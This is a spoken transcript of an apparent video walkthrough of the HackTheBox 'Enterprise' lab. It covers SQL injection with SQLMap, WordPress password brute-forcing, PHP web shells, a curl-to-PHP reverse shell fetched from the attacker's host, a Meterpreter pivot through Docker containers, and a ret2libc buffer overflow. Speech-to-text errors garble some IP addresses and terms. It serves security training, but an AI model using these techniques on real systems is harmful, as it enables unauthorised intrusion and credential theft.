What's going on, YouTube? This is Ipsec, and we're doing Enterprise from HackTheBox, which is one of my favorite boxes because it uses Docker and forces you to pivot around, and I just love having to do that in these boot to root type challenges. There's a lot of red shirts to go through to get to the captain, and well, that is fun. The box starts off with doing a dir bust to find the source code of a WordPress plugin that you can use against a WordPress site. Once you pop the WordPress site, you find out you're in a Docker image, and you just grab a bunch of passwords. You can then use those passwords against Joomla. And once you exploit Joomla, you find out you're still in a Docker container, but there's a path from that Joomla server to the host. And then once you're on the host, you find a set UID program that you can buffer overflow. But even that buffer overflow is not too difficult once you take a deeper look at it. So just a lot of small things to go through to get root. Nothing overly complicated that we haven't really covered before in videos, but chain them all together should be a good time. So let's jump in. To start things off, we're going to do a nmap, so -sc for default scripts, sv and rate versions, oa output all formats. We'll put in the directory nmap and call it initial, and the IP address of enterprise, which is 10.10.10.61. Looking at the results, we do see a few ports are listening. SSH is listening on port 22. It is a Ubuntu host, it says. And then we have Apache listening on port 80, 443, and 8080. Oddly enough, we do have different flavors of Apache listening. On the SSL port, that is 443, Apache's saying it is version 2425, and then 80 and 8080 has 2410. And the non-SSL ones are also saying they're a Debian host, while 443 is saying it is a Ubuntu host. So this is a bit odd. I'm guessing that this 443 is tied to this SSH because they both report as Ubuntu. We could probably take this Apache version and go look at what Ubuntu is packaged with and get that it is Ubuntu-10 and assume more that this is the more important server or the more edge because it's also listening on SSH. Can't guarantee, just an assumption. We do have a SSL cert on 443, obviously, and its common name is enterprise.local, so we may think that the host name of this box is enterprise.local. But let's go and check each port out and see what they are, because 80 says it's WordPress, 443 says it's the Apache 2 default page, and 8080 says it is Joomla. So going to 10.10.10.61, we get something weird. Let's just go to the other ones. 10.10.10.61 port 8080, and then HTTPS 10.10.10.61. We can look at the certificate on 10.10.10.61 because we already know it is enterprise.local, but let's check some other information out to see if we get anything else. Just scrolling down, we do see an email address, Jean-Louis Picard at enterprise.local, so he owns this box. I could say he owns the enterprise. This is interesting because this could be a username, especially because this one is tied to SSH, so maybe Jean-Louis Picard is the SSH user. If not, then may try him in Joomla and WordPress. So just searching through the rest of these, I don't see anything else. But I am going to change my host name for this to be enterprise.local to see if it brings us to a different page. So we can go into a host file and do 10.10.10.61 enterprise.local. And now let's see if they have virtual host routing set up, which would bring us to a different page. Does not appear to be the case, as we still just get the standard Apache 2 Ubuntu default page. Joomla, nothing too interesting. We do have a few posts. Click here, see if we see any authors to get other usernames. I don't see anything that's sticking out right off the bat. And then this, which says it is WordPress, but it looks ugly. So I'm going to press Control U to go into source view, and we can see what the issue is. All the links have or I think they're absolute links or whatever. They include the host name, enterprise.htb, and our box doesn't know what enterprise.htb is, so all these links are dead. So if we look, here's like a image. Of course, we know the box as 10.10.10.61/wp content, but this is saying enterprise. So let's also go back into a host file and change this to enterprise.htb, and then refresh the page. So it looks like now this page is looking better. We get the image. Things still look a bit out of whack, so I'm going to clear my history and just get rid of all the cache that could have happened. So let's refresh this page again and see anything. Okay, that's looking better. So whenever you do those DNS things, it may be a good idea to clear your cache. Refresh here, verify, so everything's fine. Click on this post. We do have a user here, William.Riker. So we know two potential users, Jean-Luc Picard, William.Riker. And the odd thing is, WordPress is going first name dot last name, and the SSL shit we had just had the full name. It's a bit of a pain to get here. Subject. So maybe it's Jean-Luc and then .Picard could be the username. So kind of just piecing things together as we're going through this box. But have a lot to do, so let's just set up a bunch of recon before we go poking at anything else. So rename this window to recon, and let's begin. The first thing I'm going to run is GoBuster, and I'm going to do that against the Apache 2 default page. So I'm going to do op GoBuster, do -h to see the flags, -u, HTTP, s, 10.10.10.61, /-w for word list, user share word list, dirbuster, directory list, 2.3 medium, invalid certificate, and looking back, we have -k to skip SSL certificate validation, and that's the same flag as curl uses, so it's easy to remember. And then while that runs, let's do another one. Let's start with WordPress. So I'm going to use wp-scan, and we're going to do -u for URL. That's just going to be 10.10.10.61. May want to put HTTP. Then we're going to do --enumerate. I'm going to do PTUTT. I'm just enumerating all options. And I don't know what the output is, so I'm just going to pipe this to T and do wp-scan.log. Okay, the next thing is let's do Joomla. So I'm going to use a program, Joomla VS, and that's written by Rostating, who created Node. So opt Joomla VS. Look at the options. I'm going to do -u, HTTP, 10.10.10.61, 80.80, -a for scan all. Don't see an output, so let's just tee that off to. And the reason I do that is because JoomScan, if we look at it, is pretty out of date. So let's go here. And 3 days ago. Commits. I swear this has been years since it's been updated. But no. Yeah, 2016, then 2018. So someone just recently started updating this. So I guess let's clone it and see if JoomScan does anything. Today I learned. Git clone. See, it's Perl script. Looks like it just wants -u. We'll pipe that to joomscan.log. So let's begin with the first thing we did, which is the dir buster. We do have /files on the HTTPS. So let's go over there, check out what the files directory is, and we have lcars.zip. So let's download that. Zip. It's got an SSL problem, so we'll add -k. Unzip it and go in the file. So lcars.php, we see the author is Jordi LaForge, which is another person. And just because of the naming schema we had from that WordPress thing, I may guess his username could be like Jordi.LaForge. Again, just guessing usernames based upon the format we previously saw. And we see he has comments, need to create a user interface, finish the database interface, has a typo on finish, Fincy, the database interface, and he needs to make it secure. So let's take a look at lcars db post. And we see the standard MySQL connecting stuff at the top. If query is set, then get query and pass query directly to a SQL statement, and then run the SQL statement without any filtering. Sounds really bad, but we do have this int right here. So query has to just be an integer, which makes this a lot harder to exploit because I don't know how to do the SQL injection with only using numbers. So this may not be vulnerable. db.php, and it could have been vulnerable if there was like a sort by or something there, but just where post name equals, I don't know how to attack that. Looking at the other file though, we see that standard SQL stuff at the top, again, is set query, but this time, query doesn't have int. And then we have select ID from WP post where post name equals query. And that is slightly different than what we saw before. So let's just open these up side by side. Them lcars d. Why aren't you showing me? That's odd. Oh, except to go in the directory, duh. lcars db post. And we have this one that selects post title from WP post where ID equals a number. This is select ID from WP post where post name equals query. So that's post title, this is post name, so doesn't really make sense on why this file exists except just to throw you down a rabbit hole. I was thinking that this query you could do like one to get the post name and then use this query with the post name to get something. But even if we did, we're going to have an issue because this is broken PHP code. We have result equals db to query SQL. This is not a string. I really hate Visual Vim with the mouse. Exit the mode. Oh, there we go. But this is not a string, so when we echo it, it's going to have a problem. If we go to the other script that isn't injectable, we have this code, which takes that object and then fetches rows to turn it into a string and echoes just that row. So this query, we're going to have to do something creative to get this to print out because it's not a string, and this echo command is going to break if this is a valid query. And we can show that when we go to exploit this. I spent a lot of time explaining that. Hopefully I did it justice. But we're going to exploit this manually at the very end of the video, and we're going to use SQLMap very shortly. And when we exploit it manually, we're going to use Python to create a pretty cool program. Target is not alive. Yeah, it is. HTTP 10.10.10.61.80.80. Try that again. So let's look at the output of WP scan. We have 14 vulnerabilities. This, it generally requires a plugin to do something that's vulnerable. This WPDB prepare. So I don't think we can really exploit this if we don't have a vulnerable plugin. Open redirect, not really useful. Path traversal and unzipping. It sounds like we'd have to be authenticated first. Path traversal and customizer, again, probably have to be authenticated. Cross-site scripting, generally aren't CTF things because there's probably not a user here to hit with cross-site scripting. Host header injection and password reset, we can test if that is valid really quick. If we go to the WordPress page and see if email is configured. I think that's /wp-login.php. Lost your password. Test@test.com. Maybe registered, but email is still probably not set up here. So if we run into problems, we may fall back to this one and see if email is indeed set up. Generally, I had one to pull off in CTFs, just because, again, it requires mail. WPDB prepare. And if you're curious what this is, there's plenty of links to go read about it. It's really cool. Again, probably requires a plugin. Authenticated JavaScript file upload. We don't have credentials yet, so we can't take advantage of that. Feed escaping, language attributes escaping. Probably going to be cross-site scripting related. New blog user key weak hashing. I don't know what that is. Cross-site scripting and denial of service. So I didn't see any like SQL injection, remote code execution, things that really stick out to me. So I'm going to keep going. ASCII-Met. That's cross-site scripting again. And now we're just getting into the username. So WP Scan didn't really bring us that much, but hey, it found the host this time. But we know, let's see, I think it's WP-content. Let's see, can we go to burp and see what plugins may be? Target, enterprise.htb, WP content. I think there's a plugins directory under that. So, plugins. And then let's guess lcars. That probably exists because if we put random junk, not found. So, what was it? lcars_db.php. If this is it, it'll say failed to read query because if we look at that script, if query is not set, fail to read. So we're going to change the query. Let's see it to be let's go back here and get a post name. Yay, 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 yay. This should be a post name. Nothing. And the reason why we probably have to put this in quotes because this SQL query, if we had where post name equals, and then we just do, what was it? Yay, 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 yay. SQL is going to error. We have to put this in quotes. Normally, the script is going to do that for us, but in this case, it doesn't. And that's why in the 1 = 1, you'd only put a quote to begin with because you got to escape the quotes the script is putting. So, don't have anything there. We can try lowercase. No. Let's just put the number 1 to see if we get lucky because integers don't have to be put in quotes. And we get this. Object of class MySQLi result could not be converted to string on line 16. And if we look at that, line 16 is this echo result. And the reason is this doesn't return a string. We have to do that fetch thing that we saw in the other thing. So the way you exploit this is force SQL to return a error message, and the error message is a string. And again, we're going to go more in depth at the very end of the video. But for now, we're just going to do the script kiddie way and SQL map this box because it does take quite a while. Well, it's not trivial if you're not used to SQL injection. So let's turn intercept on. Refresh this. Configure myself to go through. Burp. Send that to repeater. Send that to repeater. There we go. And then we can copy to file. Enterprise. And this will be lcars db.request. Okay. SQLMap. -r. We have to get out of that lcars directory. SQLMap -r for request. lcars_db.request. And we can do --dbms MySQL because looking at the scripts, we did see it using MySQL. Let this run. Make sure it's running, and then we will check out our recon. Says it is injectable, so that is very quick. We won't even look at the recon. We will just have this going wild. Come on. It's testing for all other things. Git query is vulnerable. Do you want to keep testing others, if any? No. And now we're just going to do --dump to begin dumping the database. So let's look at JoomScan while that dumps. We have 10.10.10.61.80.80. The host header is running Joomla 375 from admin manifest, and that gets found. Let's see if I can remember this path. That's /administrator /file/joomla.xml. No, I need manifest. Oh, shoot. Manifest. That should be it. Turn intercept off. And we have the extended version as 3.6 here. That's a lie. If we go down, 3.7.5 is the actual version. So that's where Joomla VS is pulling it from. So it didn't find any vulnerabilities. Let's check JoomScan. Version 3.7.5, Joomla core is not vulnerable. Admin Finder found the page to log in to Joomla and didn't find anything interesting. Let's go back to SQLMap. It's still running. So what I'm going to do is let's start off 2 dirbusters. And I'm going to move joomscan.log to documents HTTP boxes enterprise. And let's do opt go buster and then -u for URL, HTTP 10.10.10.61 -w user share word list dirbuster directory list 2.3 medium. We'll just copy this, paste. We're not saving the results anywhere. twp dot go derb dot log. Save that. Do it for Joomla. 8080 t Joomla derb.log. Okay, let's check SQLMap. It is still going. So it's taking a while to dump this database. Let's see if we can get any information out while it's going. ls SQLMap output enterprise dump nothing. Looks like I have SQLMap from another session. So while that runs, we're going to cheat and just look at the dump I've done previously. Okay. So this is very ugly. It is a dump of the WP post, and instead of using Vim, I'm actually going to use less -S to disable the word wrapping, and now I can just do left and right to go through. Because if we looked before, I have a harder time reading this than I do this. So let's see. We have the ID, the GUID, which is the URL it looks like, pinged, to ping, post date, post name, post title, parent. We just have a lot of stuff. Instead of reading through this, we're just going to search for a password, and we can see we have a few lines. So we have some not HTML, just text. Needed someone to put some passwords quickly, and then he starts putting passwords. So let's start copying these to a text file. So we got that one. Go down. So we just got that. Let's do Enterprise NCC 170. Got another one here. This looks like it may be the same. I don't know. That is different. Got one right here. So we have 4 different passwords. And we do know that William Riker is a user. So I'm going to do WP scan again. And if we look at the options, we have a way to brute force users. So I'm going to do WP scan --URL http enterprise.htb -user William Riker and -w I think for where list it was as passwords. File does not exist. It does. So I'm guessing WP scan isn't taking my current directory. So I'm just going to run pwd / before passwords. And that specified the absolute path. Let's see, http enterprise.htb. That is running WordPress. Did I knock this over with GoBuster? Nope. Let's just do the IP. Oh god. I have wpscan, wpscan.log. There we go. It's just -u. Swear, it just ran WP scan. Okay, that works. Let's look at the help. I bet it's like -- for user. Let's see. Yeah, -- username. Okay. It helps to read sometimes. And then -- word list. See what this returns. It's running through everything. It may have been faster just to attempt to log in. There we go. Brute forcing, and it found the password for William Riker. So let's log into this. Going back to Firefox, let's do /wp-login. William Riker, and the password. Did I paste that right? Yes. It's just taking its sweet time. So let's go to recon. I'm going to kill my Go Busters. Maybe I'm slowing down the server. We do have a few things that we didn't see, like Joomla has /files, /0, /1by1, but I just want to get WordPress logged in. There we go. That was an unusually long amount of time. So the first thing I'm going to do is see if we can write to the files on this. So I think it was Apocalypse that we did a WordPress one. So if you want to learn more about WordPress, go to that video. I'm just editing a template file in WordPress which has PHP code, so we can execute code. So let's see. Let's do the header. So we're editing the header, and we can put code. So let's cat op shell php cmd.php. I'm just going to copy this super simple way to execute a system command. And then we're going to update the file. Okay. So now if I do $ipsec equals ls, or is it just ip? Is it ip or ipsec? Just ip. We can look at the source, and we do have the output of ls. And oddly enough, there is a SQL shell.php. So, but let's see. Let's go for a reverse shell. So let's do which and see to see if this is on the box. It doesn't look like we have netcat. So what I'm going to do is let's open a new tab. We can go back to this one. Exit that. Exit. Don't need that. And we can name this, let's see, WordPress. So I'm going to make a directory, www, and then I'm going to go to pentestmonkey, reverse shell, cheat sheet. Actually, I have this on my box. Op shell, PHP, PHP reverse shell.php. I think this is actually part of Kali too. Let's see where this else exists. Yeah, it's all over the place, at least on my box. Users share, laudanum, PHP reverse shell. This is what I'm doing. So let's edit this file. The IP address 10.10.14.4. What is mine? I am 10.10.14.6. 8001 is a fine port. And I will run python-m simple HTTP server on port 80. Go back to here. Let's just send this to burp to make life easy. We can change request method, which, cool, is that on the box? It is. So we can do curl 10.10.14.6 PHP reverse shell.php. And we can do nc lvnp 8001. Instead of doing anything, we can just pipe that over to PHP. So we're going to curl. It's going to download all the contents of this script from a web server, and then it's going to use PHP to execute that. Click go, and we get a shell, just like that. I'm going to upgrade my TTY, so python-c import pty, pty.spawn, then bash, not found, 3, doesn't look like we have Python on this box. User lib python 2.7, that's a directory, that's a directory. 2 dev null. Yeah, it doesn't look like we have Python. It must have been removed after install or something since these exist, but definitely no executable file called Python, so we can't escalate our shell. So what else can we do? ifconfig, not found, so we're definitely on something that is very stripped down. So we're going to do ipaddr. This is the new way to do IP addresses in Linux. Ifconfig is deprecated. It has been deprecated for a while. So the IP is the new hotness. We see our IP is 172.17.04, which is different than the one we connect to it on, which is 10.10.10.61. So I'm going to do IP neighbors. This is going to replace ARP, because ARP probably isn't on the box if ifconfig isn't. And we do see it talking to 172.17.01 and 172.17.02. So 01 is probably going to be the gateway or host. 02, I'm going to guess, is the database server. But we can kind of check that by going to var www html, and let's cat the wp config.php. See, we got the DB user as root, database name as WordPress, database host as MySQL, but we do have a password, ncc1701e. So, let's see. Let's add that to our password file. Don't need that anymore. That is SQL. Let's see. Cat etc host. And we have 172.17.02 as MySQL. So that is correct. We do have weird things also. If we look at our host name, it is just a string of random things. This looks like it is either like a LXC or a Docker image name that is generated. There's probably other ways to check if we're on those, but I'm not exactly sure how. But don't need to. I want to get into that MySQL database because we know the root password. So we can do MySQL, and it's not found. So how I did this is I used this access to generate a metal shell, which is Meterpreter, and then use Meterpreter to pivot. So that's what we're going to do. So we can save that, close that. Let's bring that down, and let's split that window. MSF Venom -- list grep for metal, and for Linux they had started rewriting Meterpreter, rebranding it to metal, and then decided to rebrand metal back to Meterpreter, I think. So it's called both, but just grepping for metal only shows the Linux ones. And MSF Venom always takes a while to run. I don't know why. Just want a list. There we go. Probably should just save that to a file and grep the file. That would save quite a bit of time waiting. So I want to do the reverse TCP, and then MSF Venom list format. I know the format itself. You can do a command to list the format and get that, but Linux files, exe is ELF in Linux. So -p for payload, Linux x64 Meterpreter reverse TCP. We have to do reverse, not bind, because my host doesn't know how to talk to that 172 address. lhost is equal to my IP, which is 10.10.14.6. lport, we'll say 8002. And we gotta do -f for format, elf, and -o, we'll call this msf.bin. While that's going, let's launch MSF console. Okay, it saved the elf. It is elf. And on this, we can do uname -a to verify our host is on 64-bit. Okay, so use exploit multi-handler set payload. Copy that. Meterpreter. Oh, come on. I'm just waiting for it to autocomplete. And then we can set lhost 10.10.14.6, set lport 8002, exploit-j. So we now got a TCP handler listening. We can move MSF bin to www, go there, Python M, simple HTTP server 80. On our shell, we go to dev shm. I'm going to curl 10.10.14.6 msf.bin and save that as msf.bin, I guess. So we have to make this executable with chmod plus x. Then when we execute this, permission denied is executable, is an elf. Dev shm has no exec. So let's move to temp. Still executable. What's in .sam? I guess spoilers. Someone probably didn't clean up because that's September 7th, around the time we launched the box. So, won't go into that. /msf.bin. And we look, we have Meterpreter session 1 has opened. And also, this whole pivoting thing isn't needed because we are root on the database and you could have just dumped Joomla's table from WordPress. but instead of just doing dash dash dump dash all and SQLMap, I figured it's more beneficial to show pivoting. So now we have Meterpreter session 1 open. We can do two things. We can just do sessions-i1 to interact with it and do port FWD. If we do -help, it tells us the thing, so we can do add, indicate a reverse forward port. I think that's what we want to do. So we want to do a reverse port forward. We want to listen on, we'll say, 8003. We want to forward to port 3306, which is MySQL. And the host is going to be 172.17.02, I believe. If we just add like that. Okay, a local port, a remote host, and a remote port. Oh, I think I said -r and type -p. So now if we curl localhost 3306, no, we listened on 8003, -o, we'll call this temp, we get a MySQL prompt. So we could just do MySQL-h localhost 8003-u root -p. The password is this. Unknown MySQL server host SQL-h help. I don't know the command option for port. Is it -P? I'm not sure. There is a way to get MySQL to go to it through that port, but I just don't remember off the top of my head. How I normally do port forwards is I just do use exploit multi-handler. No. Search socks. We can use auxiliary server socks 4a. Show options. That's good. We're listening on port 1080. We can run that. Then we can go to v etc proxy chains. Verify that we have proxy chain set up for socks 4 on port 1080. And then just run proxy chains MySQL -u root -p -h and 172.17.02. Password, I think I took that off my clipboard. Connection refused. I wonder if I have the port wrong. Proxy chains, curl 172.17.02, 3306-0, temp2. Couldn't connect. It's odd. Split this. Let's change this port. 8004. NCLVNP 8004. Start Python. Let's get another shell. There's times where you think everything's just going to go well, and it doesn't. Okay, 172.17.02. It is reachable. Oh god. Route add 172.17.02 or 00/24 1. So we have to tell Metasploit to route stuff through that session. I knew I was forgetting something. Now this should work. There we go. Now we're on the box, so don't forget to do the route add. So we can do show databases, and we see Joomla, JoomlaDB, WordPress, WordPressDB. So we could just now use Joomla, show tables, it's empty, use JoomlaDB. It's reading all the tables. Show tables, and we have a lot of tables. So let's go up here, and I guess search for user. So I'm guessing EDZ2G users is the table with usernames. So I'm going to use, describe that table, EDZ2G users. And we have ID, name, username, email, password. So we can just select ID, name, username. We probably don't need email. Password from EDZ2G users. And we have two users. The super user is Jordi LaForge, and then we have Goonan. Could try to crack these hashes, but before we do, let us just manually try logging in. Because always could send them over to a cracking rig and try to crack it, but with only 4 passwords we've gotten so far, let's just do it manually. It's taking a while to respond. Is burp on intercept? It is indeed. So, login name. Let's try a password. Login. Not it. Copy the next one. Whoops. Don't have that in my clipboard, so let's copy this. Log in. And we get in. So we are now a super user on Joomla. So we can do exactly what we had just done with WordPress, but for Joomla. And I'm trying to remember exactly where to go to edit a template. I'm guessing templates. So if we go here, let's see, let's edit templates. This is what the page looked like. Sweet. Index.php. And let's just add our shell at the top of this. Opt shell PHP, cmd PHP. Save. And I'm just going to go into repeater, and we're going to change this to be port 8080. Let's see, we can close that. We don't need that session anymore. That's fine. Let's just rename this to Joomla. go into www, v PHP Reverse Shell, it's 8004. And we can just do Python simple TP server, run this, get a shell, and now we have access to the Joomla server. So let's go into var www IP-ADDR 192.17.03 IP nay for neighbors, and still just talking to the two boxes. So it's odd. I remember from my Dirbuster a long time ago, we had a files on Joomla. So let's look at that. We don't even have to Dirbust anymore because we are literally on the box. And we have lcars.zip on the Joomla box, and that looks like the same file we had downloaded from HTTPS. So we can md5 sum it, md5 sum lcars.zip, and it's that same exact file. Let's see. Is anything here? So that looks odd, I think. We got the files directory and a few others with their own mount point. Let's go over the WordPress box. Oh, I closed out of that. So I wonder if it's like that here. If I have to exit this, kill one, do I get my MSF bin back? I don't get the shell back. 8001. Hold on. PHP Reverse Shell. 8001. Start up. I'm going to do this a few times, so I'm just going to put this in a new one. Port 80. Okay. Rename. Get shell. WordPress. Rename. Get shell. Joomla. Go. Okay, it is. Wait. This is Joomla. Mount. Okay, we do have a bunch of, like, var.ww HTML is specifically mounted. But the difference between Joomla is we have a /files. And if we remember, as I said, if we went to enterprise.local /files, we have the lcars.zip. So, let's see. I'm going to touch IPsec. Refresh. And we get a file on HTTPS. And remember, if we go back to the Nmap scans, this one, 443, is listing on a different version and most likely has SSH listing as well. So, let us drop a shell there. Echo. Oh, we can just do the same thing we've always been doing. So cd-www, PHP Reverse Shell, loaded to port 8005, and -m. Already in use, that's fine. Cool. 10, 10, 10, 61. PHP Reverse Shell.php. I want that to be vertical. 8005. Oh, I'm trying to save this. Crap. It's not found. Where am I listening? Should have been found. Weird. Oh, I don't know what I was thinking. It's late. It's almost 11. Curl 10.10.14.6 slash php reverse shell dot php dash o php, we'll call this just ipsec.php. Okay. Refresh this page, and we do have ipsec.php. And to keep things a bit cleaner, we'll exit this, create a new one, and label this Enterprise. Help if I listen on a port. Netcat on that, go, and we get a shell. If we do host name, I'm still in Docker, I think. www cd.html. Hell, I'm on WordPress. That is odd. Did I actually click go there? Enterprise.local, ipsec. I think I clicked go on Burp Intruder and just didn't notice. Because now I am on the host, and we should have Python. Which Python 3? Yes, I do. So python-c import pty, pty.spawn, bin dash. Got to type Python 3. We'll just copy and paste this. Okay, background this, sty raw minus echo, foreground. Now we got a proper shell in this box, and we can say term's going to be equal to screen, and that should be fine for now. I should be able to clear. Export term. Okay, so now we can begin the attempt to escalate privileges because we own a host, or on a better machine, and have a lot of IP addresses. We can see that 10.10.10.61 address, and we can see 172.17.01 is a Docker address. So let us begin the enumeration. So the very first thing is let's run a Linux enumeration script. So I gotta stop my web server there, and we'll create a new thing here. So ceww and cp op lin privesc lin enum.sh, and we'll copy it here. Python m simple http server 80, and we can execute this with curl 10.10.14.6 lin enum.sh, and if you just Google lin enum.sh GitHub, you'll find it. So let's see, go to bash and let this run. Stuffing a bunch of information. Well, that goes. We can change thorough to true if we want. Oh, it is on thorough. So I did make that modification. I did in a previous video and just, I guess, didn't clean up. Thorough is equal to 1 in the beginning, so it's always going to do a thorough/lengthy test. So that could take a while. Let's just begin looking at what it's found. Cool. There we go. So we got the host name, the kernel compiled in 2017. Probably shouldn't waste time looking for a kernel exploit if that's not intended, because this box was released in 2017. I think it was, but Ubuntu version 17.04. User group info, we're www data. Jean-Luc Picard is logged into TTY1. Group memberships, let's see. Jean-Luc Picard is a member of sudo, so if we get access to this account, we should be able to privesc. We're www data, and I don't think we're really a member of anything. We can go into this directory, so we could see if there's any sensitive files there. Files owned by user, but writable by group. This is part of that lengthy test. Word readable files in /home. Nothing there. Home directory contents has the HTML. So I'm guessing this HTML is probably WordPress. And there's mounts that are going to... it's probably both WordPress and Joomla in this HTML. And then www HTML has files. And the reason for that is I'm guessing they just pretty much created a shortcut in the Docker on this box. So the host machine can edit the files within Docker. Let's see, Apache log. Nothing there. Shells, nothing there. Password stuff. Cron jobs. Nothing unique. Again, the interfaces. So let's go back to where we left off. 17.0. Okay. URP history. Don't need. Default route. Don't need. We do see it is listening on two addresses that we missed. 32812 and 5355. So I don't know what those two ports are, but it did not appear in our nmap because we didn't scan all ports. So that is something we should definitely look into. Running processes. Let's see. Let's just highlight ones by root. Apache. Not much there. These are permissions from the binaries above. We can just ignore that. etcnet.d. Sure. Apache directory. SUID files. Let's see. Anything here? We do have /bin/lcars with the set UID bit owned by root. So if we exploit that program, we can get ownership of this box. So that is probably what we're going to have to do, since that is a unique file. So if we md5 sum, do I not have a shell in this box right now? Oh, I think it died. That's odd. Let's see. Kill 33827. Set. Listen again. Go back here. Launch this again. Looks like I lost connection, or the box is reverting. So I'm going to pause the video to take a look at exactly what is going on. Okay, looks like the issue is fixed. My internet just went down for a bit. So I'm going to refresh this page, get my shell again, verify I am on the host. Okay, let's do a real TTY. TTY raw minus echo, foreground. There we go. So what do we say? Bin lcars, bin, and base64-d, lcars, not dash d, we just want to base64 it. Okay, let's go to the very beginning. Very beginning, and copy everything. Okay, go back to my host, lcars.b64, paste, base64-d, and let's check the sums on the files. Looks good, so we can begin our reverse engineering. And I'm going to do that in a new tab, actually. So let's make lcars executable, and then execute it. And we have enter bridge access code. When we hit junk, we just get terminating console. So we could cheat and use like syscall trace on this file, and then hit junk, and we see, let's see, test, maybe it's ltrace. Do I have that? We'll try ltrace. Lcars. We see it using the strcomp with our user input, which was just junk ASD, and procured A1. So if we procured A1, actually let's get rid of that, but you can see we got to the menu there. So let's /lcars procured A1. So that's one way to do it. If you want to use radar, we can load it in with our two lcars, AAA to analyze functions, and then I'm just going to hit VV to get into visualization mode. And I'm going to look at all the functions we have, and I'm going to go on a hunch that says bridge auth is the function I want. So I'm going to go there, hit G, then capital V to enter this mode where I can more easily read what's happening. And at the start of this function, we are moving bytes 1 byte at a time. So P, I, C, ARD, A1. Move all those bytes. And I think we're load effective address. And I think this is where we're actually getting user input, maybe. Scroll up. I'm not 100% positive. That may be it. Or it may just be loading all the bytes we moved. I'm not positive. But anyways, we do have it doing a compare and then immediately a jump. So one way we call main menu, the other way we die. So that's how you would do it over radar. Now, if we enter lcars, enter bridge access code, procured A1, we get a menu. And what I'm going to do is the lazy way to fuzz this. Let's go python .c, print a times 500. Get 500 A's, and we're just going to throw them at these one at a time. 1 did not crash. Let's see, 2. Nothing happened. 3. That was odd. We did crash on 3. It implemented something. Secondary route routines not implemented. Terminating console, seg fault. So let's try that again. Make sure we have a reliable crash. It does. Let's see other ones. 4. Code A1. 4. It just seg faults right away. 5. Terminating console. So that was a graceful exit. 6. I guess that's not implemented. And then 7's exit. So we have a buffer overflow potentially at option 3 and option 4. So now we have to go and look into them to see if any are exploitable. So let's launch GDB on lcars. We can run it. Access code. Go to 3. Paste our 500 A's. And we get it exit normally. It's odd. I could have swore we seg faulted before. Access code. No, it just terminated. Maybe I fat fingered and hit 4 the last time. Okay, let's proceed to case 4 and see if we still seg fault. Run card A1. No, it's not what I wanted. Let's just rerun this. For security code. Okay, that's a seg fault. So we do have a crash and we overwrote EIP. So by far, the easiest first thing is create a pattern create. We'll do 500 and paste this. Run this again. Picard A1 for enter. Now we can search for this. Pattern find. Offset 212. So after 212 A's, we have a EIP overwrite. So we can verify that by going down here, Python print a 212, then print 1, 2, 3, 4 B's. So now EIP should be all B's. Run this one more time. 4. And we get all 42s and EIP. So we know exactly where to overwrite. So let's go new thing. Vim buff.py EIP overwrite at 212. Okay. And while I'm at it, we can make this smaller. And that looks more comfortable. The next thing we have to do is a check sec and see what compile time options are. We do have canaries, fortify, and dep disabled, but we do have pi, the I was going to say what it stands for, and then it just came on the tip of my tongue. It's essentially ASLR, but we need to check if ASLR is enabled on Enterprise. So we can do that in, I forget exactly where this is. Proc, can we find grep random? Will it let us do this? Dev null. Okay, so we can do that. So we can cat proc sys kernel randomize VA space, and we get a 0, so ASLR is disabled on this host. We can further verify that by doing ldd bin lcar and grep for libc. And if you watch my other videos, when I did this on machines that had ASLR, this memory address would change every time. But libc is being loaded in the same spot every single time, which makes our exploitation very easy. So let's go over to our tab, and we'll create a skeleton exploit. So from pwn import stir, context equals OS Linux, and arc equals i386. I think that's right. Then host port equals. Oh, the one thing we didn't do is netstat alnp grep list. We went over this a little bit, but didn't verify which port it was. 328. Let's check those. NC 10.10.10.16 port 32812. '61. There we go. So we have it running on the server on that port. We can check 5355. Don't know what that is. We can find out after we pop the box. But the port 32812. So 10.10.10.61 32812. And the host needs to be in quotes. Okay. Then we need our junk. So we can do \90 for a NOP. Doesn't really matter, could put anything there. Could put A's, B's, whatever. And we need to do the ret2 libc equals p32. We don't know this address yet. That's going to be system. We need a exit call. And we need the string sh. Our payload is going to be junk plus ret2 libc. Combine those. And we need to do the fun part. So r.receive until. And we need r.sendLine. First one was procured A1. See, after procured A1, we sent a 4. And then I think we sent our payload. So now we need to get what those receives are. So NC 10.10.10.61 32812. And a bridge access code. This is card A1. Waiting for inputs, the next one. Then after that, enter security override. That is our buffer overflow, and after that, our interactive. That should be good. Let's go here. We're on the box. We can do GCC on lcars. Not GCC. GDB on lcars. Long day. and a bridge access code. We don't actually need that. We can just Control C to background it. And having a full PTY is really awesome, so we can do this. We want to print system. That's the address we want. Waiting for input up here. We could put the same thing for exit because it doesn't really matter, but we'll just be kind and put the correct address. And then we need to find a sh string. So we will do find at system. We'll go bunch of spaces ahead, and we're looking for sh. Found 4 patterns where sh is. So we can try verifying this. That looks good. Paste this over. Let's see what I fat fingered, because there's no way I ever type anything correctly once. Let's just edit this again and try removing that. Or is not defined. I need to connect. R equals remote host port. And it looks like it worked. ID, ls, no we did not. So let us look into everything and see what we screwed up now. Everything looks fine. And I see the next error. We need plus equals. That's what I get for copy and pasting those lines. And we have it. We are now root. So let's see. If we go to cd/root, root.txt, we could also Docker images, and see this box is indeed running Docker. So that is the box. We will be now stepping through the SQL injection. Let's create what's hopefully our last pane, and we'll name this SQL injection. First things first, let's analyze exactly what's been going on in the scripts. I said a lot of things earlier on this video, but we never showed it. So we'll SSH as Jean-Louis Picard at 10.10.10.61, type the super secret password of A that I changed it to, and we'll sudo su. You're wondering how I changed it? Well, if you're following along in this video, you have root by now, so let your imagination run wild. Let us do Docker images. We want to get into the WordPress one, so Docker exec it WordPress. I forgot bash. There we go. Go in WP content, plugins, lcars. And remember this lcars db.php file. We want to see exactly what was happening here. So let's open up VI, not found, nano, not found. Well, I guess we can cat this. So we'll name this test.php. I know there's probably a more elegant way to do that cat command, but there's 100 ways to skin a cat, and my way still works. So paste this. And we're going to do echo SQL. Don't know if I need that in quotes in PHP. I don't think I do. Hopefully I don't. We'll find out. That doesn't look right, but we'll find out. Get a new line, and we want to echo get, is it type or types? I think type. SQL. No, we want result. Echo. No! That just screwed up. Let's cat this file. To test.php, we'll paste this. Okay. Echo SQL. Echo new line. Echo get type result. Hopefully it's not get types. Echo /n. Then we can paste the rest. So if we go to our box, let's see. Let's just do HTTP, enterprise HTTP, WP content, query equals 1. Remember we got this object class couldn't return. Let's change this to test.php. View the source. And now we can see the query we ran, which is select ID from WP post where post name equals 1. The object type, the variable type is an object, so that's why echo failed. It couldn't convert the object to a string, and that's because we don't have that fetch result query. The other thing I want to point out 